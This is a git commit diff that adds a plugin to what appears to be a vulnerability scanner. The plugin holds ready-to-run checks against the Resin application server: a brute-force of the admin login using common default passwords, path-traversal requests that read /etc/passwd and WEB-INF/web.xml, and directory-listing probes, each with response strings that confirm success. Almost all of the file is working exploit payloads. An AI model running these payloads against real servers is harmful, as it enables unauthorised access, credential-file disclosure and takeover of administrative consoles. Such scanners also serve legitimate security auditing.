new plugin

2019-03-28 23:56:13 +08:00
parent e02d314f4a
commit 905931df7c
16 changed files with 499 additions and 8 deletions
--- a/plugins/resin_plugin.py
+++ b/plugins/resin_plugin.py
@@ -0,0 +1,75 @@
+#coding=utf-8
+pocs=[
+    {"requests_option":"POST",
+     "url":["/resin-admin/j_security_check?j_uri=index.php"],
+     "params":[],
+     "data":["j_username=%s&j_password=%s"],
+     "flag":['<th>Resin home:</th>','The Resin version','Resin Summary'],
+     "success":"exist /resin-admin/j_security_check?j_uri=index.php weak password",
+     "fail":"NOT exist /resin-admin/j_security_check?j_uri=index.php weak password",
+     "end":"/resin-admin/j_security_check?j_uri=index.php扫描完成",
+     "admin_bursk":"True",
+     "username":['admin'],
+     "password":['admin','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root'],
+     },
+    {"requests_option":"GET",
+     "url":["/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"],
+     "params":[],
+     "data":[],
+     "flag":["root:"],
+     "success":"exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
+     "fail":"not exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
+     "end":"/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成",
+     "admin_bursk":"",
+     "username":[],
+     "password":[],
+     },
+    {"requests_option":"GET",
+     "url":["/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml"],
+     "params":[],
+     "data":[],
+     "flag":["xml version"],
+     "success":"",
+     "fail":"",
+     "end":"/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成",
+     "admin_bursk":"",
+     "username":[],
+     "password":[],
+     },
+{"requests_option":"GET",
+     "url":["/%20..\\web-inf"],
+     "params":[],
+     "data":[],
+     "flag":["<h1>Directory of"],
+     "success":"",
+     "fail":"",
+     "end":"/%20..\\web-inf扫描完成",
+     "admin_bursk":"",
+     "username":[],
+     "password":[],
+     },
+{"requests_option":"GET",
+     "url":["/%3f.jsp"],
+     "params":[],
+     "data":[],
+     "flag":["<h1>Directory of"],
+     "success":"",
+     "fail":"",
+     "end":"/%3f.jsp扫描完成",
+     "admin_bursk":"",
+     "username":[],
+     "password":[],
+     },
+{"requests_option":"GET",
+     "url":["/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],
+     "params":[],
+     "data":[],
+     "flag":["root:"],
+     "success":"",
+     "fail":"",
+     "end":"/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成",
+     "admin_bursk":"",
+     "username":[],
+     "password":[],
+     },
+]